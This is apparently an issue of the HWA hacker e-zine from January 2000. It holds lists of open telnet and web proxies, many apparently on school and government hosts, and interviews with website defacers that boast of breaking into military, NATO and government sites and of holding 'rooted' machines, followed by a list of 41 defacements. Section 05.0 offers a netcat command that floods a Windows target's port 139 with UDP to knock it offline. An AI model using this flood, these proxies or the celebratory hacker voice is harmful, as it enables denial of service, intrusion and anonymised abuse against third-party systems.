well there are but if you ask something really dumb we'll just laugh at ya, lets give the
message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org
domain comes back online (soon?) meanwhile the beseen board is still up...

==============================================================================

02.0 From the editor.
~~~~~~~~~~~~~~~~

#include <stdio.h>
#include <thoughts.h>
#include <backup.h>

main()
{
printf ("Read commented source!\n\n");

/*
* Hey, the world didn't end at 23:59 12/31/99 wow huh?
* well i've been busy so you're getting more than two weeks worth
* of news in one issue. Sorry if this doesn't waggle yer wig but
* I decided it would be better than releasing two issues again.
*
* This issue sports a few interviews with underground figures
* if there is anyone that you'd like interviewed or want to
* offer yourself up, email me and we'll work something out,or
* at least try to. Meanwhile, enjoy the issue and tty next time
*
* This issue: fuqrag, ytcracker and mosthated.
*
* Cruci
*
* cruciphux@dok.org
* ICQ:58939315 note; not always online, do not abuse!
* Preffered chat method: IRC Efnet in #HWA.hax0r.news
*
*/

printf ("EoF.\n");
}

Snailmail:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5

Congrats, thanks, articles, news submissions and kudos to us at the

main address: hwa@press.usmc.net complaints and all nastygrams and

mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to

127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.

-= start =--= start =--= start =--= start =--= start =--= start =--= start

____ _ _
/ ___|___ _ __ | |_ ___ _ __ | |_
| | / _ \| '_ \| __/ _ \ '_ \| __|
| |__| (_) | | | | || __/ | | | |_
\____\___/|_| |_|\__\___|_| |_|\__|
/ ___|| |_ __ _ _ __| |_
\___ \| __/ _` | '__| __|
___) | || (_| | | | |_
|____/ \__\__,_|_| \__|

-= start =--= start =--= start =--= start =--= start =--= start =--=

03.0 www.2600.com, jokers to the end?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

On New Year's Day visitors to the venerable 2600.com site were greeted
with the following:

Internal Server Error

The date specified (01-01-1900) is impossible. If you have forced this
error condition, you may be in violation of state, federal, and/or civil
laws. Those outside the United States should check with their respective
governments concerning their country's extradition
treaty. Dissemination of this error is also strictly prohibited.

If you believe you have received this message in error, please reload the
page and try again.

-=-

It looks realistic but we're pretty sure that it was not generated by the
server and is actually a phake error message... - Ed

@HWA

04.0 More irc4all proxies (01/03/00)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The info from below is taken from the site located at http://www.lightspeed.de/irc4all/
it offers an up to date list of various proxies, mostly public, some not, check it out
for further details. - Ed

Telnettable Proxies
~~~~~~~~~~~~~~~~~~~

NotFound,200.36.19.225,
NotFound,206.103.12.131,
NotFound,210.56.18.225,
NotFound,210.56.18.226,
NotFound,210.56.18.241,
NotFound,200.248.68.129,
NotFound,210.56.18.253,
NotFound,200.248.69.50,
noeljo9.lnk.telstra.net,139.130.54.153,
modemcable215.2-200-24.hull.mc.videotron.net,24.200.2.215,
edtn004203.hs.telusplanet.net,161.184.152.139,
NotFound,195.14.148.98,
blissr.lnk.telstra.net,139.130.54.131,
PPP46-166.lvsb.vsnl.net.in,202.54.46.166,
cr216724724.cable.net.co,216.72.47.24,
cr216724718.cable.net.co,216.72.47.18,
122-94.w3.com.uy,207.3.122.94,
saward.lnk.telstra.net,139.130.55.98,
icqtwsrv1.maiowoo.com,203.135.240.3,
NotFound,212.22.69.35,
122-85.w3.com.uy,207.3.122.85,
gw.eudynelson.com,207.176.25.66,
sis-zeus.sville.edu.ph,207.0.119.67,
dns-server1.tj.pa.gov.br,200.242.244.1,
theleu.lnk.telstra.net,139.130.74.160,
210-55-191-125.ipnets.xtra.co.nz,210.55.191.125,
nor24788-1.gw.connect.com.au,202.21.13.46,
NotFound,210.161.200.82,
www.slcr.cz,212.27.210.65,
NotFound,210.56.19.5,
northeastmicro.com,204.170.187.254,
NotFound,195.5.33.222,
marina.amakusa.gr.jp,210.164.238.50,
h0040053c7824.ne.mediaone.net,24.128.48.55,
NotFound,216.72.45.152,
tconl9076.tconl.com,204.26.90.76,
NotFound,193.227.185.210,
NotFound,194.243.99.199,
NotFound,202.54.48.85,
NotFound,200.21.157.61,
server.goway.com,205.206.42.162,
web.urudata.com.uy,207.3.122.84,
cr2167248104.cable.net.co,216.72.48.104,
frontier.netline.net.au,203.28.52.160,
interate.com.pe,209.45.73.174,
210-55-191-126.ipnets.xtra.co.nz,210.55.191.126,
com3058-2.gw.connect.com.au,202.21.8.108,
PPP46-254.lvsb.vsnl.net.in,202.54.46.254,
NotFound,195.14.148.99,
ibp.santa.krs.ru,195.161.57.133,
mail.theova.com,195.14.148.65,
cr2167254143.cable.net.co,216.72.54.143,
NotFound,142.250.6.2,
plebiscito.synapsis.it,195.31.227.14,
ipshome-gw.iwahashi.co.jp,210.164.242.146,
other.issei-dc.co.jp,210.164.241.99,
x1-6-00-60-b0-66-08-f7.cust.planetcable.net,24.137.18.44,
NotFound,209.177.38.98,
www.ymts.sakha.ru,194.186.182.2,
mail.ermanco.com,12.2.82.130,
mail1.bikesusa.com,207.176.25.114,
ewwmail.ozemail.com.au,203.108.128.242,
modemcable106.22-200-24.timi.mc.videotron.net,24.200.22.106,
patter.lnk.telstra.net,139.130.81.160,
server.hirup.khmelnitskiy.ua,195.230.134.227,
port58151.btl.net,206.153.58.151,
wdpcbalt.wdpc.com,208.222.211.65,
dns.gincorp.co.jp,210.164.86.34,
ts18.svamberk.cz,212.47.11.231,
mail.coolmore.com.au,203.12.145.98,
NotFound,195.14.148.101,
cr216724770.cable.net.co,216.72.47.70,
ip110.gte5.rb1.bel.nwlink.com,209.20.218.110,
ci272608-a.sptnbrg1.sc.home.com,24.4.115.144,
edsl78.mpls.uswest.net,209.181.225.79,
NotFound,210.114.231.130,
mooty.lnk.telstra.net,139.130.81.14,
NotFound,168.187.78.34,
NotFound,203.116.5.58,
c111.h202052116.is.net.tw,202.52.116.111,
cr2167251178.cable.net.co,216.72.51.178,
altona.lnk.telstra.net,139.130.80.123,
NotFound,139.130.59.187,
nevisco.city.tvnet.hu,195.38.100.242,
edtn003590.hs.telusplanet.net,161.184.150.34,
NotFound,193.15.227.125,
dns1.ctsjp.co.jp,210.172.87.146,
gaon.zg.szczecin.pl,195.116.25.98,
NotFound,195.5.33.218,
edtn003331.hs.telusplanet.net,161.184.149.29,
edtn003725.hs.telusplanet.net,161.184.150.169,
dt027n36.san.rr.com,24.30.137.54,
tsp-proxy.tsss.com,12.2.81.50,
austra53.lnk.telstra.net,139.130.56.114,
NotFound,195.161.69.65,
modemcable118.21-200-24.timi.mc.videotron.net,24.200.21.118,
cascad.lnk.telstra.net,139.130.44.197,
edtn003171.hs.telusplanet.net,161.184.148.123,
tob24399-1.gw.connect.com.au,202.21.14.234,
ad112-162.magix.com.sg,165.21.112.162,
NotFound,195.146.98.226,
NotFound,193.232.250.133,
lesy.vol.cz,212.27.211.5,
HSE-Montreal-ppp32859.qc.sympatico.ca,216.209.195.103,
north.ocs.k12.al.us,216.77.56.66,
adsl-98.cais.com,207.176.4.98,
modemcable161.21-200-24.timi.mc.videotron.net,24.200.21.161,
NotFound,195.146.97.178,
fsf.santa.krs.ru,195.161.57.178,
HSE-Montreal-ppp32305.qc.sympatico.ca,216.209.193.57,
ohs.ocs.k12.al.us,216.77.56.122,
NotFound,195.14.148.100,
carver.ocs.k12.al.us,216.77.56.114,
oms.ocs.k12.al.us,216.77.56.106,
C824154A.podernet.com.mx,200.36.21.74,
NotFound,193.15.228.156,
wingate.shokoren.or.jp,210.145.221.99,
cpu1555.adsl.bellglobal.com,206.47.27.36,
NotFound,195.14.148.97,
expocom.dial-up.cz,193.85.249.31,
edtn003655.hs.telusplanet.net,161.184.150.99,
mb-kop-p2.mbusa.net,63.65.123.172,
www.sos.iqnet.cz,212.71.157.102,
jeter.ocs.k12.al.us,216.77.56.98,
modemcable241.4-200-24.hull.mc.videotron.net,24.200.4.241,
ip48.gte5.rb1.bel.nwlink.com,209.20.218.48,
sai0103.erols.com,207.96.118.243,
wforest.ocs.k12.al.us,216.77.56.82,
165-246.tr.cgocable.ca,24.226.165.246,
morris.ocs.k12.al.us,216.77.56.74,
ken9029.tsukuba.accs.or.jp,210.154.99.29,
www.cassvillesd.k12.wi.us,216.56.42.3,
ns.elaso.cz,195.146.96.178,
proxy.wmisd.k12.mi.us,199.176.179.4,

SOCKS Proxies
~~~~~~~~~~~~~

WWW/FTP Proxies
~~~~~~~~~~~~~~~

Location Provider System Port Service(s)

AE pd4k-2.emirates.net.ae 8080 WWW / FTP
AR proxyweb2.ssdnet.com.ar 8080 WWW / FTP
AT erde.salzburg.at 8080 WWW / FTP
AU Hutchisons T. proxy.hutch.com.au 80 WWW / FTP
AU OzEmail netcachesyd3.ozemail.com.au 8080 WWW / FTP
AE Government lino.privacy.fgov.be 8080 WWW / FTP
BN Brunei proxy1.brunet.bn 8080 WWW / FTP
BR Telemar CAICO.telern.com.br 80 WWW / FTP
CA Csjlor www.csjlor.qc.ca 8080 WWW / FTP
CA RAPIDUS 237-67-239.tr.cgocable.ca 80 WWW / FTP
CH proxy.vtx.ch 8080 WWW / FTP
COM IWVISP proxy.iwvisp.com 8080 WWW / FTP
COM HRO gateway.hro.com 8080 WWW / FTP
COM RipNET IS CacheFlow01.RipNET.comZ 8080 WWW / FTP
CZ inet01.cabletel.cz 80 WWW / FTP
CO Compunet proxy.compunet.net.co 3128 WWW / FTP
DE TU Berlin andele.cs.tu-berlin.de 80 WWW / FTP
DE Uni-Kl. maccaroni.unix-ag.uni-kl.de 3128 WWW / FTP
DE ibaserver.ub.uni-dortmund.de 8080 WWW / FTP
DK www-cache.net.uni-c.dk 3128 WWW / FTP
EDU hermes.curry.edu 8080 WWW / FTP
ES Softec linux.softec.es 8080 WWW / FTP
FR cri.ens-lyon.fr 3128 WWW / FTP
FR INFONIE proxy2.infonie.fr 80 WWW / FTP
HR gita.srce.hr 80 WWW / FTP
IL Goldnet goldcache.goldnet.net.il 80 WWW / FTP
IS dyna0.islandia.is 8080 WWW / FTP
IT colnuovo.iuss.unipv.it 80 WWW / FTP
JP inet-sv.zenon.co.jp 8080 WWW / FTP
JP ns.hiu.ac.jp 80 WWW / FTP
JP Tokyo Uni kpcu.kumamoto-pct.ac.jp 8080 WWW / FTP
KR Taegu biho.taegu.ac.kr 8080 WWW / FTP
KR Kyunghee cvs2.kyunghee.ac.kr 8080 WWW / FTP
LB data450.dm.net.lb 3128 WWW / FTP
NET bright.net cacheflow.bright.net 8080 WWW / FTP
NET Stargate Ind. cacheflow.tcg.sgi.net 8080 WWW / FTP
NET BRASILNET magic.brasilnet.net 8080 WWW / FTP
NET Global One gip-rjo-1-wc01.br.global-one.net 8080 WWW / FTP
NG engine3.micro.com.ng 8080 WWW / FTP
NL GelreVision webproxy.gelrevision.nl 80 WWW / FTP
NO webcache1.globalone.no 80 WWW / FTP
PH Info mail2.info.com.ph 3128 WWW / FTP
PH electron2.msc.net.ph 3128 WWW / FTP
PT Teleweb caclis01.teleweb.pt 3128 WWW / FTP
QA Qatarnet proxy.qatar.net.qa 8080 WWW / FTP
RO lhab-gw.soroscj.ro 80 WWW / FTP
RU adam.rosinkas.ru 80 WWW / FTP
SE Varnamo ns.varnamo.se 8080 WWW / FTP
SG proxy1.tp.ac.sg 80 WWW / FTP
TR Turnet ankara3.turnet.net.tr 8080 WWW
TW Golden club.golden.com.tw 8080 WWW
TW IS c1.h202052106.is.net.tw 80 WWW / FTP
UK poptel.net softy.poptel.org.uk 8080 WWW / FTP
UK proxy1.cdesd.k12.or.us 80 WWW / FTP
US K12 stpauls.pvt.k12.al.us 8080 WWW / FTP
US cache.manistee-isd.k12.mi.us 80 WWW / FTP
YE ? sah3.ye 80 WWW / FTP
ZA M-Web proxy-rnb2.mweb.co.za 80 WWW / FTP
ZA M-Web proxy.cpt.mweb.co.za 80 WWW / FTP
ZW Cybergate proxy.cybergate.co.zw 8080 WWW / FTP
ZW Africaonline proxy.africaonline.co.zw 8080 WWW / FTP

@HWA

05.0 Simple Windows DoS using common tools and UDP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HWA labs: Twstdpair

This is a very simple but deadly windows DoS that appears to work on all
Win9x boxes. You need a large binary file as the datafile (fuckfile.bin)
to create a long stream of data, we used an 80 meg binary file for test
purposes, essentially you will be flooding the well known netbios TCP/UDP
port 139, in this case we'll be attacking with UDP packets. The result is
that the attacked system will falter and eventually fail making it
essentially useless and losing net connection.

"Discovered" accidentally by Twstdpair, when retaliating against some
unruly port scanning kiddies harassing his system. :-p

Useage:

You need netcat for this example.

> cat fuckfile.bin | nc -u 24.111.111.111 139

You can issue this attack from *nix boxes or from windows using the
windows netcat port.

System will become unresponsive and eventually die.

@HWA

06.0 Slash interviews website defacer/cracker Fuqrag Jan 10th 2000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HWA Exclusive. You may reproduce this if credit is given for
the source, quote http://welcome.to/HWA.hax0r.news, an HNN
affiliate.

<fuqrag> sure.. why not
> Tell us something about You ? !
> How did U start defacing
> ?
<fuqrag> well..
<fuqrag> there are tons of reasons why i did what i did..
(and still might do.. not sure yet)
<fuqrag> but..
<fuqrag> i started mostly cause i was extremely bored
> bored ?!
<fuqrag> yeah.. as in had nothing else better to do
> :)))
> so U started defacing.....
<fuqrag> plus.. i was also depressed over my gf dumping
me..
> :)
> :(
<fuqrag> and some other things as well
<fuqrag> yeah..
<fuqrag> i'd never been into defacing shit before
> how llong have U been hacking !?
<fuqrag> didn't really have a reason to
<fuqrag> damn..
<fuqrag> let's see..
<fuqrag> i just turned 30 back in october
<fuqrag> and i've been in the scene since like when i was
12
<fuqrag> so.. damn.. that's a long time
> :)))))
> that's long
> how did U start hacking !?? !
> was it the BBS age back then !?
<fuqrag> hangin out with the wrong (or maybe right) people
on bbs's .. shit like that
> so why did U stop defacing !?
<fuqrag> mostly to take a break... and give the .gov's &
.mil's a break as well..
<fuqrag> as well as every 1 else in between
> but why did U hit all those high profiled sites
> !?!
> why .mil and .gov
<fuqrag> the bigger the better
<fuqrag> i figured this..
<fuqrag> it's like.. if you're gonna scream your head off..
then get on top of the biggest buildings.. and then scream
> Is there an defacment that U'r most proud of
> ?
<fuqrag> hmm..
<fuqrag> several actually
<fuqrag> hard to pick just 1
> which R that !?
<fuqrag> the NSA website, DiSA, deca.mil, usitc.gov, the
coe.fr, and probably the intelsat.int, as well as the 2 nato
sites..
<fuqrag> also kingston.com
<fuqrag> that was my last 1
<fuqrag> and it was on thanksgiving day ;)
> :)
<fuqrag> and let's not forget dairyqueen heh
> hehe
> U declared war to the Government on U'r deca.mil defacment
right !?
<fuqrag> sorta but not really
<fuqrag> pretty much every 1
<fuqrag> any 1 with power that abuses it (be it country or
company)
> What do You think of the FBI ?!:)
<fuqrag> you really wanna know what i think about the fbi?
<fuqrag> uhmm.. ok
<fuqrag> they're a bunch of fuckin morons
> :))))
> that's true
> :)
> U ain't afraid to get raided !?
<fuqrag> yeah
<fuqrag> not really
> how is that !?
<fuqrag> fuck'em if they can't take a joke!
<fuqrag> i mean like..
<fuqrag> what's to be afraid of
<fuqrag> ya know?
> well....
> U can go to jail
<fuqrag> the worst that can happen is i go to prison..
> well, that's it
> U goto jail
> and U'r life is all fucked up
<fuqrag> yeah.. but as long as i remain who i am, as an
individual...
> U can't get a job
<fuqrag> in my thoughts.. my beliefs..
> everyone thinks U killed somebody
> I'll tell U sumtin
> Hacking changed my life
> for good
> That's my obsesion
> Hacking is a state of mind baby
> and I don't give a fuck If I get raided
<fuqrag> i agree
> do U ?
<fuqrag> absolutely
> I meen
<fuqrag> i know the defacing stuff is not cool
> yeah
> but
> I deface to spread the message out
> I don't give a fuck about fame
> fame meens nothing to me
<fuqrag> neither do i
<fuqrag> tell ya the truth...
<fuqrag> i honestly didn't think any 1 would care or even
notice
<fuqrag> i figured that there was so much shit already
being hit before i came along..
<fuqrag> that i didn't think it would really matter
> But people did notice
<fuqrag> and i'm not really into interviews and stuff..
but, that's why only people like you, and osall, etc.. not the
nytimes.. or cnn, etc.. shit like that
<fuqrag> i know they did
<fuqrag> if i'd known that i was gonna get the kindof
attention that i have gotten before i started... i would've
re-thought my actions
<fuqrag> i'm actually a very private person
<fuqrag> usually keep to myself most of the times
> U married !?
> :)
<fuqrag> heh
<fuqrag> no
> :(
> so what do U do in U'r life !?
<fuqrag> me and my ex- were together 3+ years.. we were
suppose to get married like next summer.. but.. oh well
<fuqrag> actually..
<fuqrag> i'm a freelance security consultant
<fuqrag> ;)
> :)
> that suits U fine
<fuqrag> yeah.. but i went to filmschool
> yeah !?
<fuqrag> that's what i use to wanna do
<fuqrag> and maybe some day i still will.. who knows
> "Hackers the sequel " by fuqraq
<fuqrag> heheh
<fuqrag> uhmm.. not quite
<fuqrag> i was interviewed for a documentary awhile back
though
<fuqrag> it's called: "Hackers, Crackers, and Lamers"
> no shit
> :)))
<fuqrag> some chick that does documentaries for cnn or some
shit
<fuqrag> yeah
<fuqrag> they actually filmed me doing "live-hacks"
> U heard of flipz !?
> :)
<fuqrag> heh
<fuqrag> yeah
> U 2 know each other !?
<fuqrag> we have our differences from time to time..
<fuqrag> but..
<fuqrag> we always end up still being good friends
> kewl
<fuqrag> he annoys the shit out of me.. but he's still cool
> U were in gH and sSH ?!
<fuqrag> gH yes.. sSh no..
> no !?
<fuqrag> even though they put me on their member's list (i
dunno why).. i was never a member
> I thought I saw U in their members list
<fuqrag> not even an affiliate
<fuqrag> sSh is a bunch of lamers with nuthin better to do
> U plan to start hacking again ?
<fuqrag> dude.. i'm always hackin
> :)))
> aaight
<fuqrag> just not defacin right at the moment
<fuqrag> and not nt bawx's either
> NT sux
<fuqrag> i fuckin hate nt
<fuqrag> yeah it does
> I advise people to put BSD or SunOS
> but no
<fuqrag> yeah..
> They R smarter than me
> "We will put what we want"
<fuqrag> i run linux (SuSE), and NetBSD mostly
> They:"sumtin what is easy to use"
> ME: "Sumting that is easy to penetrate in"
<fuqrag> heheh
> They:"U'r fired"
<fuqrag> definitely the latter
<fuqrag> ME: aight.. go ahead and be a loser
<fuqrag> heheh
> ME:" ok, just wait till I get home and find some sploit for
Youre box"
> heheh
<fuqrag> no doubt
> bsd is coo
> Never tried suse doh
<fuqrag> i like it
<fuqrag> SuSE is nice
> I heard it comes on 7 cd-s
<fuqrag> 6
> heh
<fuqrag> ;)
> U code !?
<fuqrag> a little
> c !?
> perl !?
<fuqrag> some c (just startin to get really heavy in it)
<fuqrag> perl, shell script, pascal
<fuqrag> yes.. i do have pascal on my linux bawx
> :)))
<fuqrag> heh
> I have VB on my linux box
<fuqrag> really..?
> can U belive it !?
<fuqrag> under wine?
> y
<fuqrag> coz.. under windows.. i do mostly vb
> no shit
> me too
<fuqrag> yeah.. i love vb
> it's good
<fuqrag> i got started usin it years back, when i was makin
front-ends for access db's
<fuqrag> also do some xbase legacy code (like fox pro,
etc..)
> I started programing in qb firsth
> I knew only 1 command
> U know what that was !?
<fuqrag> yeah.. me too
<fuqrag> actually..
<fuqrag> i started with gwbasic
> kewl
<fuqrag> under like dos 3.1 or some shit like that
> the first command I learned in qb was....
> BEEP
> :))))))
<fuqrag> heh
<fuqrag> that's cool
> Than i started learning
> IF then
<fuqrag> ahhh.. the memories
> for NExtT
> N shit
> then came VB
> winsock programing
> aaaaaargghhhhhh
> winsock1.open
> shit
> :)))))
<fuqrag> heh
> It's coo to program
> to know how to program
<fuqrag> yeah it is
> U on win box now !?
<fuqrag> most people take it for granted
<fuqrag> no
<fuqrag> linux
> k
<fuqrag> i'm always in unix of some sort
> aaight
> dewd
<fuqrag> lately i've been rewtin bawx's in china & korea
<fuqrag> ya?
> can U do me a favor !?
<fuqrag> what's that?
> www.akz.hr
> I'm kinda admin on that box
> can U check it out
> do a /whois slasht
<fuqrag> sure..
> U'll see I come from rtr.akz.hr
> don't deface plz
> I know U can :))))
<fuqrag> heh.. i won't
> just gimme some proof
<fuqrag> what do u want me to do.. just check it out on
security and shit?
> yeah
> winNT 40
> :)))
<fuqrag> ok..
> k
<fuqrag> but..
> what !?
<fuqrag> i'm not really that much into nt..
> well, just try
<fuqrag> and i only know a few ways of gettin in..
<fuqrag> that's about it
> ok
> I'm a shitty admin
> so It shouldn't be a problem
> :))))))
<fuqrag> well..
> well...
> ?
<fuqrag> nt isn't that hard to admin
> I know
> :)))))
<fuqrag> and on top of that i don't know all of the
vulnerabilities for nt
> I'm kinda into solaris 'n stuph
<fuqrag> me too
<fuqrag> i won't say that i don't use scripts.. sure i do..
every 1 does.. but, when it comes to nt, that's usually how i've
had to get in.. except maybe port 139.. and even then so
<fuqrag> i guess i could sit around and try to brute ur
pop3
> :)))
<fuqrag> every 1 thinks i know alot about NT and shit.. but
i never claimed i was anything great..
<fuqrag> i have
<fuqrag> your shit is safe from msadc
> hehhe
> :)))
<fuqrag> which is good.. coz that shit is too easy..
> heh
> I ain't a shitty admin afterall
> :)))
<fuqrag> no you're not
<fuqrag> heh
> hehe
> :))
<fuqrag> if you ever need any rewted korean bawx's let me
know
<fuqrag> ;)
<fuqrag> got plenty
<fuqrag> heh
> :)))))
> :P
> Is there any1 on the scene that U trully admire !?
<fuqrag> hmm
<fuqrag> yeah.. i have a lot of respect for Erik B.
> that's the dewd that sings with rakim !? !?!
> :)))
<fuqrag> also peter Shipley
<fuqrag> no.. i meant.. bloodaxe
<fuqrag> eric bloodaxe
> oh, ok
<fuqrag> and also Peter Shipley from dis.org
> ooooohhh
<fuqrag> that dude's a mad coder
<fuqrag> also.. 1 more dude.. for sure..
> that is .... !?
<fuqrag> i have a lot (and i do mean a lot) of respect for
aempirei
<fuqrag> aka.. ambient empire
<fuqrag> he's a good friend.. and a bad ass coder as well
<fuqrag> as well as XXyla.. (yes.. a chick).. she's bad ass
when it comes to fones
> aaight
<fuqrag> and another chick ;) named crow (she can code..)
> any1 U hate !?
<fuqrag> not really..
> not hate
> just don't like
<fuqrag> i don't really "hate" or dislike any 1
<fuqrag> i accept every 1 for who they are
<fuqrag> no matter the skill level
> kewl
> CAn I ask a personal q !?
<fuqrag> as long as they're straight up with me.. i'm
always straight up with them
<fuqrag> sure.. go ahead
> U going on a party for New year's eve !?
> :)))
<fuqrag> uhmm..
<fuqrag> probably not
> not ?!?!
<fuqrag> nah
> why is that !?
<fuqrag> i dunno
> well...ok
> just don't get mad drunk
> and try to hack www.fbi.gov
<fuqrag> i'd rather be with my ex-.. but since she doesn't
want me any more..
> :(
<fuqrag> oh well
<fuqrag> heh
<fuqrag> probably sit around and deface shit
> :P
<fuqrag> j/k
> :)))))
<fuqrag> or.. maybe not.. ;)
> :)
<fuqrag> who can tell
> "US government says: Hackers give us a brake"
> Will U givem a brake! ?
<fuqrag> hmm
<fuqrag> yeah i'll give 'em a break
<fuqrag> me breakin' my foot off up in dat ass
<fuqrag> heh.. seriously.. tho
> :)))
<fuqrag> yeah.. i'll leave 'em alone
> aaight coo
> Ok
> the editor is gonna kill me now
> I'm way over the limit with this
<fuqrag> why's that?
<fuqrag> oh..
<fuqrag> heh
> Any shouts U wanna give
<fuqrag> what's their page again?
<fuqrag> uhmm..
<fuqrag> sure..
> of the ezine !?
> welcome.to/hwa.hax0r.news
<fuqrag> much luv to: xxyla, aempirei, cristyn, vghk,
f0bic, flipz, and nostalg1c
> aight
> thanx for the interview bro
> keep it real on show them what's hacking all about
<fuqrag> but.. u don't have to put that if u don't want
to.. but if u do.. definitely to them.. ;)
<fuqrag> aight
<fuqrag> plan on it
<fuqrag> and thanks for your time as well.. ;)
> peace out

-----------------------------------------/* end interview /*-----------------------------

defaced sites:

[99.10.27] NT [fuqrag] Commander, Helicopter Tactical Wing, U.S. Atlantic Fleet (eagle.chtwl.spear.navy.mil)

[99.10.27] NT [fuqrag] Naval Surface Warfare Center, Carderock Division (scotty.navsses.navy.mil)

[99.10.27] NT [fuqrag] Commander Submarine Force U.S. Pacific fleet (www.csp.navy.mil)

[99.10.27] NT [fuqrag] Defense Information School (www.dinfos.osd.mil)
[99.10.27] NT [fuqrag] Federal Mediation and Conciliation Service (www.fmcs.gov)
[99.10.27] NT [fuqrag] Marine Corps Base, Hawaii (www.mcbh.usmc.mil)
[99.10.27] NT [fuqrag] Naval Security Group Activity Pensacola (www.nsg.navy.mil)
[99.10.27] NT [fuqrag] U.S. International Trade Commission (www.usitc.gov)
[99.10.28] NT [fuqrag] Dairy Queen (www.dairyqueen.com)
[99.10.28] NT [fuqrag] U.S. Minerals Management Service (www.mms.gov)
[99.10.28] NT [fuqrag] TriStar Computers International (www.tristar.com)
[99.10.29] NT [fuqrag] U.S. Office of Personnel Management (apps.opm.gov)
[99.10.29] NT [fuqrag] #2 U.S. Minerals Management Service (www.mms.gov)
[99.10.30] NT [fuqrag] California State Assembly Democrats (democrats.assembly.ca.gov)

[99.10.30] NT [fuqrag] Domino Server for the Office of Civilian Radioactive Waste Management (domino1.rw.doe.gov)

[99.10.30] NT [fuqrag] Space Shuttle Flight Tracker, Johnson Space Center (flight.jsc.nasa.gov)

[99.10.31] NT [fuqrag] (ncr) DISA (dssg-web-srv.ncr.disa.mil)
[99.10.31] NT [fuqrag] City of Fresno Gov (gw.fresno.gov)
[99.11.02] NT [fuqrag] Defense Commissary Agency (www.deca.mil)
[99.11.02] NT [fuqrag] U.S. Navy Electronic Commerce Homepage (www.ec.navsup.navy.mil)

[99.11.03] NT [fuqrag] Naval Medical Research Institute (www.nmri.nnmc.navy.mil)
[99.11.06] NT [fuqrag] Office of Small & Disadvantaged Business
Utilization, Department of Transportation (osdbuweb.dot.gov)

[99.11.11] NT [fuqrag] PWD Malaysia (corp.jkr.gov.my)
[99.11.11] NT [fuqrag] Ministcre de l'Environnement et de l'�nergie de
l'Ontario (ene.gov.on.ca)

[99.11.11] NT [fuqrag] Chinese Ministry of Foreign Affairs (fmprc.gov.cn)
[99.11.11] NT [fuqrag] Taipei Government (intra.taipei.gov.tw)
[99.11.12] NT [fuqrag] Belgium Ministry of Economic Affairs (mineco.fgov.be)
[99.11.12] NT [fuqrag] Supremo Tribunal Federal (www.stf.gov.br)
[99.11.12] NT [fuqrag] Shj Library, Saudi Arabia (shjlib.gov.ae)
[99.11.12] NT [fuqrag] Singapore Government Shopfront (shop.gov.sg)
[99.11.14] NT [fuqrag] Unreal Web site (www.unreal.com/index2.html)
[99.11.22] NT [fuqrag] IntelSat (www.intelsat.int)
[99.11.22] NT [fuqrag] #1 NATO Airborne Early Warning and Control
(www.naewfc.nato.int)

[99.11.22] NT [fuqrag] Supreme Headquarters Allied Powers Europe
(SHAPE) (www.shape.nato.int)

[99.11.23] NT [fuqrag] Atlantic Council of the United States (www.acus.org)
[99.11.23] NT [fuqrag] Council of Europe Convention (www.coe.fr)
[99.11.23] NT [fuqrag] John Romero's Ion Storm (www.ionstorm.com)
[99.11.23] NT [fuqrag] Canopus Corporation (www.justedit.com)
[99.11.24] NT [fuqrag] Hemp Cat (www.hempcat.com)
[99.11.25] NT [fuqrag] Asia-Pacific Economic Cooperation (www.apecsec.org.sg)
[99.11.25] NT [fuqrag] Kingston Technology Corp (www.kingston.com)

Total Defacements: 41

- defacement list provided by attrition.org

Slash is an HWA correspondant, email him at smuddo@yahoo.com
cc: your comments to cruciphux@dok.org

@HWA

07.0 Interview with sSh member YTcracker Jan 10th 2000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HWA Exclusive. You may reproduce this if credit is given for
the source, quote http://welcome.to/HWA.hax0r.news, an HNN
affiliate.

ytcracker is a member and founder of the 'new' sSh 2000 hacking group
(Sesame Street Hackers, formerly run by dap) and has defaced many
websites in recent months you can see mirrors of his work on Attrition.org
a site that archives web defacements.

The IRC interview:

Session Start: Mon Jan 10 12:07:23 2000
[12:07] <ytcracker> yo
<Cruciphux> So you up for an interview now?
[12:07] <ytcracker> hit it
<Cruciphux> ok cool
[12:07] <ytcracker> *grammar mode on*
<Cruciphux> *g*
[12:07] <ytcracker> leave the channel
[12:07] <ytcracker> go back
[12:07] <ytcracker> get ops
<Cruciphux> ok
[12:09] <ytcracker> back to the task at hand
[12:09] <ytcracker> haha
<Cruciphux> oky
<Cruciphux> lets get some basic history, how old are you and how long have you been on the internet?
<Cruciphux> you can refuse to answer any questions btw :)
[12:09] <ytcracker> i'm 17 and five months, been on the inet since i was six.
<Cruciphux> do you code in any languages and do you take computer courses at school?
<Cruciphux> or are you self taught?
[12:10] <ytcracker> i'm completely self-taught and i hate school
[12:10] <ytcracker> haha
<Cruciphux> you've cracked a good many sites, do you use your own exploits or scripts from others?
[12:11] <ytcracker> i code in a load of languages but my strongest skills are probably in cpp and vb.
[12:11] <ytcracker> i use other peoples stuff mostly
[12:11] <ytcracker> msadc is probably what made me NoToRIOUs
[12:11] <ytcracker> hahah
[12:11] <ytcracker> i do know how to code in core x86 assembler
<Cruciphux> would you consider yourself a 'Script Kiddie" then?
[12:12] <ytcracker> i wouldn't, no
<Cruciphux> a cracker?
[12:12] <ytcracker> a defacer
[12:12] <ytcracker> well, former defacer
[12:12] <ytcracker> i don't even really take part in that much anymore
<Cruciphux> when you were defacing, what was the main reason behind it? just because you could? or boredom? or fame? or some other reason(s)?
[12:13] <ytcracker> i wrote an article detailing my motives
[12:13] <ytcracker> i would argue it was a mix of a lot of thing
[12:13] <ytcracker> i didn't intend for the media to take any interest
<Cruciphux> yes you did, It was on HNN
<Cruciphux> but that was a while ago.
[12:14] <ytcracker> yea
[12:14] <ytcracker> hahahah
[12:14] <ytcracker> i gotta do my laundry
<Cruciphux> ok wanna continue later?
[12:14] <ytcracker> haha no go ahead
[12:14] <ytcracker> i was reminding myself
<Cruciphux> k
